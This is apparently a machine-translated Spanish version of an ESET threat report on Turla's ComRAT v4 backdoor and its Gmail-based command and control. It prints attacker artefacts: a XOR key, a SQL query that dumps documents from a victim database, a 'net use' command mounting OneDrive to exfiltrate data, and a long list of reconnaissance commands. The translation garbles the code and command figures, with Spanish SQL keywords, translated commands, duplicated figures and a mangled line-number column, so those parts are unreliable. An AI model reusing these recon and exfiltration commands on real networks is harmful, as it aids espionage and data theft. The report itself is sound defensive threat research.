Turla ha actualizado su puerta trasera ComRAT y ahora usa la interfaz web de Gmail para Comando y Control
Los investigadores de ESET han encontrado una nueva versión de una de las familias de malware más antiguas administradas por el grupo Turla, ComRAT. Turla, también conocida como Snake, es un grupo de espionaje infame que ha estado activo durante más de diez años. Hemos previamente describió muchas campañas atribuidas a este grupo.
ComRAT, también conocido como Agent.BTZ y para sus desarrolladores como Chinch, es un troyano de acceso remoto (RAT) que se hizo infame después de su uso en una violación del ejército de los EE. UU. en 2008. La primera versión de este malware, probablemente lanzado en 2007, exhibió capacidades de gusano al extenderse a través de unidades extraíbles. De 2007 a 2012, se lanzaron dos nuevas versiones principales de la RAT. Curiosamente, ambos emplearon la conocida clave Turla XOR:
1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s
Hasta mediados de 2017, los desarrolladores de Turla hicieron algunos cambios en ComRAT, pero estas variantes aparentemente todavía se derivaron de la misma base de código.
Luego, en 2017, notamos que se había lanzado una versión muy diferente de ComRAT. Esta nueva versión utilizaba una base de código completamente nueva y era mucho más compleja que sus predecesoras. Estas son las principales características de esta familia de malware:
- ComRAT v4 se vio por primera vez en 2017 y se sabe que todavía está en uso en enero de 2020.
- Identificamos al menos tres objetivos: dos Ministerios de Relaciones Exteriores y un parlamento nacional.
- ComRAT se usó para exfiltrar documentos sensibles. Los operadores utilizaron servicios de nube pública como OneDrive y 4shared para filtrar datos.
- ComRAT es una puerta trasera compleja desarrollada en C ++.
- ComRAT utiliza un sistema de archivos virtual FAT16 formateado en FAT16.
- ComRAT se implementa utilizando métodos de acceso existentes, como la puerta trasera PowerStallion PowerShell.
- ComRAT tiene dos canales de comando y control
- HTTP: utiliza exactamente el mismo protocolo que ComRAT v3
- Correo electrónico: utiliza la interfaz web de Gmail para recibir comandos y filtrar datos
- ComRAT puede realizar muchas acciones en las computadoras comprometidas, como la ejecución de programas adicionales o la extracción de archivos.
Atribución a Turla
Según la victimología y los TTP, creemos que ComRAT es utilizado exclusivamente por Turla. Hay algunos elementos que vinculan ComRAT v4 a Turla:
- Utiliza el mismo nombre interno, Chinch, que las versiones anteriores.
- Utiliza el mismo protocolo C&C personalizado sobre HTTP que ComRAT v3
- Una parte de la infraestructura de red se comparte con otra familia de malware de Turla, Mosquito
- Fue arrojado por, o ha caído otro, Turla familias de malware:
- Un cargador PowerShell personalizado
- La puerta trasera de PowerStallion
- La puerta trasera RPC
Información sobre la actividad del atacante
Durante nuestra investigación, pudimos obtener información sobre lo que los operadores de Turla estaban haciendo en las máquinas comprometidas.
El uso principal de ComRAT es robar documentos confidenciales. En un caso, sus operadores incluso implementaron un ejecutable .NET para interactuar con la base de datos central de MS SQL Server de la víctima que contiene los documentos de la organización. La Figura 1 es el comando SQL redactado.
sqlCommand.CommandText = "select top" + num2.ToString () + "filename, img, datalength (img), id from
sqlCommand.CommandText + = "y datalength (img)<1500000 and (filename like '%.doc' or filename like '%.docx' or filename like '(0-9)(0-9)(0-9)(0-9)(0-9)(0-9)(0-9)(0-9)%.pdf' or (filename like '3%.pdf' and len(filename)>9)) ";
sqlCommand.CommandText + = "ordenar por id";
sqlCommand.CommandText = "seleccionar arriba" + num2.Encadenar() + "nombre de archivo, img, longitud de datos (img), id de sqlCommand.CommandText + = "y longitud de datos (img)<1500000 and (filename like '%.doc' or filename like '%.docx' or filename like '(0-9)(0-9)(0-9)(0-9)(0-9)(0-9)(0-9)(0-9)%.pdf' or (filename like '3%.pdf' and len(filename)>9)) "; sqlCommand.CommandText + = "ordenar por id"; |
Figura 1. Comando SQL para volcar documentos de la base de datos central (parcialmente redactado)
Estos documentos se comprimieron y se filtraron a un proveedor de almacenamiento en la nube como OneDrive o 4shared. El almacenamiento en la nube se monta utilizando el comando net use como se muestra en la Figura 2.
tracert -h 10 yahoo.com
uso neto https://docs.live.net/E65
tracert -h 10 yahoo.com
tracert –h 10 yahoo.com red utilizar https://docs.live.net/E65 tracert –h 10 yahoo.com |
Figura 2. Comando para montar una carpeta OneDrive usando uso neto (parcialmente redactado)
Además del robo de documentos, los operadores también ejecutan muchos comandos para recopilar información sobre los grupos o usuarios de Active Directory, la red o las configuraciones de Microsoft Windows, como las políticas de grupo. La Figura 3 es una lista de comandos ejecutados por los operadores de Turla.
gpresult / z
gpresult / v
gpresult
vista neta
vista neta / dominio
netstat
netstat -nab
netstat -nao
nslookup 127.0.0.1
ipconfig / all
arp -a
participación neta
uso neto
información del sistema
usuario de red
administrador de usuario neto
usuario / dominio neto
grupo neto
grupo / dominio neto
grupo local neto
grupo local neto
Administradores de grupo local neto
grupo de red "Equipos de dominio" / dominio
grupo de red "Administradores de dominio" / dominio
grupo de red "Controladores de dominio" / dominio
dir "% programfiles%"
grupo de red "Servidores de Exchange" / dominio
cuentas netas
cuentas netas / dominio
vista neta 127.0.0.1 / todo
sesión neta
ruta de impresión
ipconfig / displaydns
1 2 3 4 4 5 5 6 6 7 7 8 9 9 10 11 12 13 14 15 dieciséis 17 18 años 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
gpresult / /z gpresult / /v gpresult red ver red ver / /dominio netstat netstat –coger netstat –nao nslookup 127.0.0.1 ipconfig / /todas arp –una red compartir red utilizar información del sistema red usuario red usuario administrador red usuario / /dominio red grupo red grupo / /dominio red grupo local red grupo local red grupo local Administradores red grupo "Computadoras de dominio" / /dominio red grupo "Administradores de dominio" / /dominio red grupo "Controladores de dominio" / /dominio dir "%archivos de programa%" red grupo "Servidores de Exchange" / /dominio red cuentas red cuentas / /dominio red ver 127.0.0.1 / /todas red sesión ruta impresión ipconfig / /displaydns |
Figura 3. Reconocimiento básico de la máquina comprometida
Finalmente, también notamos que los operadores de Turla son conscientes e intentan evadir el software de seguridad. Por ejemplo, extraen regularmente archivos de registro relacionados con la seguridad para comprender si se han detectado sus muestras de malware. Esto muestra el nivel de sofisticación de este grupo y su intención de permanecer en las mismas máquinas durante mucho tiempo.
Análisis técnico
Según su marca de tiempo de compilación, que probablemente sea genuina, la primera muestra conocida de ComRAT v4 se compiló en abril de 2017. La iteración más reciente de la puerta trasera que hemos visto fue, según nuestro conocimiento, compilada en noviembre de 2019.
Basado en la telemetría de ESET, creemos que ComRAT se instala utilizando un punto de apoyo existente, como credenciales comprometidas o mediante otra puerta trasera de Turla. Por ejemplo, hemos visto ComRAT instalado por PowerStallion, su puerta trasera basada en PowerShell que describimos en 2019.
El instalador de ComRAT es un script de PowerShell que crea una tarea programada de Windows y llena un valor del Registro con la carga útil cifrada.
ComRAT v4 tiene varios componentes:
- un orquestador, inyectado en explorer.exe. Controla la mayoría de las funciones de ComRAT, incluida la ejecución de comandos de puerta trasera.
- un módulo de comunicación (una DLL), inyectado en el navegador predeterminado por el orquestador. Se comunica con el orquestador utilizando una tubería con nombre.
- un sistema de archivos FAT16 virtual, que contiene la configuración y los archivos de registro.
La Figura 4 es una descripción general de la arquitectura de ComRAT.
ComRAT v4 tiene dos canales diferentes de C&C: HTTP (conocido internamente como legado), que (sorpresa sorpresa) usa el protocolo HTTP, y correo electrónico (conocido internamente como correo), que usa la interfaz web de Gmail.
En el último modo y utilizando cookies almacenadas en la configuración, se conecta a la interfaz web de Gmail para verificar la bandeja de entrada y descargar archivos adjuntos de correo específicos que contienen comandos cifrados. Los operadores de malware envían estos comandos desde otra dirección, generalmente alojados en un proveedor de correo electrónico gratuito diferente, como GMX.
Un análisis técnico detallado de todos los componentes de ComRAT está disponible en el papel blanco.
Conclusión
ComRAT v4 es una familia de malware totalmente renovada lanzada en 2017. Sus desarrolladores se inspiraron en otras puertas traseras de Turla, como Snake, para construir una pieza de malware muy compleja.
Su característica más interesante es el uso de la interfaz de usuario web de Gmail para recibir comandos y filtrar datos. Por lo tanto, puede omitir algunos controles de seguridad porque no depende de ningún dominio malicioso. También notamos que esta nueva versión abandonó el uso del secuestro de objetos COM por persistencia, el método que le dio al malware su nombre común.
Encontramos indicios de que ComRAT v4 todavía estaba en uso a principios de 2020, lo que demuestra que el grupo Turla sigue siendo muy activo y una gran amenaza para diplomáticos y militares.
Se puede encontrar una lista completa y completa de Indicadores de Compromiso (IoC) y muestras en el papel blanco y en nuestro repositorio GitHub.
Para un análisis detallado de la puerta trasera, consulte nuestro documento técnico. Para cualquier consulta o para realizar presentaciones de muestras relacionadas con el tema, contáctenos en hazardintel@eset.com.
Técnicas MITRE ATT y CK
Táctica | Carné de identidad | Nombre | Descripción |
---|---|---|---|
Ejecución | T1086 | Potencia Shell | Se utiliza un script de PowerShell para instalar ComRAT. |
Persistencia | T1053 | Tarea programada | ComRAT utiliza una tarea programada para iniciar su cargador de PowerShell. |
Evasión de defensa | T1027 | Archivos o información ofuscados | El orquestador ComRAT se almacena cifrado y solo se descifra en la ejecución. |
T1055 | Inyección de proceso | El orquestador ComRAT se inyecta en explorer.exe . La DLL de comunicación se inyecta en el navegador predeterminado. | |
T1112 | Modificar registro | El orquestador ComRAT se almacena cifrado en el Registro. | |
Descubrimiento | T1016 | Descubrimiento de configuración de red del sistema | Los operadores ejecutan ipconfig y nbstat . |
T1033 | Propietario del sistema / descubrimiento de usuarios | Los operadores ejecutan usuario de red . | |
T1069 | Descubrimiento de grupos de permisos | Los operadores ejecutan grupo / dominio neto . | |
T1082 | Descubrimiento de información del sistema | Los operadores ejecutan información del sistema . | |
T1083 | Descubrimiento de archivos y directorios | Los operadores enumeran el contenido de varios directorios. Ejemplo: dir / og-d "% userprofile% AppData Roaming Microsoft Windows Recent *. *" . | |
T1087 | Descubrimiento de cuenta | Los operadores ejecutan usuario de red y grupo neto . | |
T1120 | Descubrimiento de dispositivos periféricos | Los operadores ejecutan fsutil fsinfo drives para enumerar las unidades conectadas. | |
T1135 | Descubrimiento de redes compartidas | Los operadores ejecutan vista neta . | |
Colección | T1213 | Datos de repositorios de información | Los operadores utilizan una herramienta personalizada para filtrar documentos de una base de datos central interna. |
Comando y control | T1024 | Protocolo criptográfico personalizado | ComRAT utiliza RSA y AES para cifrar los datos de C&C. |
T1043 | Puerto de uso común | ComRAT utiliza los puertos 80 y 443. | |
T1071 | Protocolo de capa de aplicación estándar | ComRAT usa HTTP y HTTPS. | |
T1102 | Servicio web | ComRAT se puede controlar a través de la interfaz de usuario web de Gmail. | |
Exfiltración | T1002 | Datos comprimidos | Los documentos están comprimidos en un archivo RAR. |
T1022 | Datos cifrados | El archivo RAR está encriptado con una contraseña. | |
T1048 | Exfiltración sobre protocolo alternativo | Los datos se filtran al almacenamiento en la nube, montados localmente utilizando el uso neto mando. |